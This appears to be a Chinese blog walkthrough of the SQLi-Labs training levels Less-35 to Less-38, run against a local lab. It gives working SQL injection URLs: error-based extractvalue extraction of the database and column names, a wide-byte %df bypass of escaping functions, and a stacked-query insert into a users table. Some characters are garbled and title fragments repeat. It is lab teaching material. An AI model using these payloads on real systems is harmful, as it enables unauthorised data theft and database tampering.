LESS-35-36-37-38-39

LESS-35 LESS-35-36-37-38-39
由于id没有被单引号括起来所以addslashes起不到作用所以俺正常提交即可。

输入：
http://127.0.0.1/sqlilabs/Less-35/?id=-1 and extractvalue(1,concat(0x7e,(select database()),0x7e))–+ LESS-35-36-37-38-39
less-36
本体的本质和前面相同不过采用的是MySQL_real_escape_string过滤\。

http://127.0.0.1/sqlilabs/Less-36/?id=1�' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=�' user�'),0x7e))–+

输入：
http://127.0.0.1/sqlilabs/Less-36/?id=1�’ and extractvalue(1,concat(0x7e,(select database()),0x7e))–+ LESS-35-36-37-38-39 LESS-37
添加了
输入：admin %df%27and extractvalue(1,concat(0x7e,(select database()),0x7e))–+
LESS-38
这个是检查PHP是否连接上MYSQL，就是一个判断函数1、mysqli_multi_query() 函数执行一个或多个针对数据库的查询。多个查询用分号进行分隔。（有这个才能进行堆叠）
2、可以调用mysql_fetch_row()来获取结果集中的行，或调用mysql_row_seek()和mysql_row_tell()来获取或设置结果集中的当前行位置。一旦完成了对结果集的操作，必须调用mysql_free_result()。
3、而mysql_store_result()得到result是存下来的，你无需把全部行结果读完，就可以进行另外的查询。比如你进行一个查询，得到一系列记录，再根据这些结果，用一个循环再进行数据库查询，就只能用mysql_store_result()
4、my_bool mysql_more_results(MYSQL *mysql) 如果当前执行的查询存在多个结果，返回“真”，而且应用程序必须调用mysql_next_result()来获取结果。
输入：http://127.0.0.1/sqlilabs/Less-38/?id=1’; insert into users(id,username,password) values (‘38’,‘less’,‘hello’)–+ （单引号没输入会出错）
LESS-35-36-37-38-39
成功添加：

相关推荐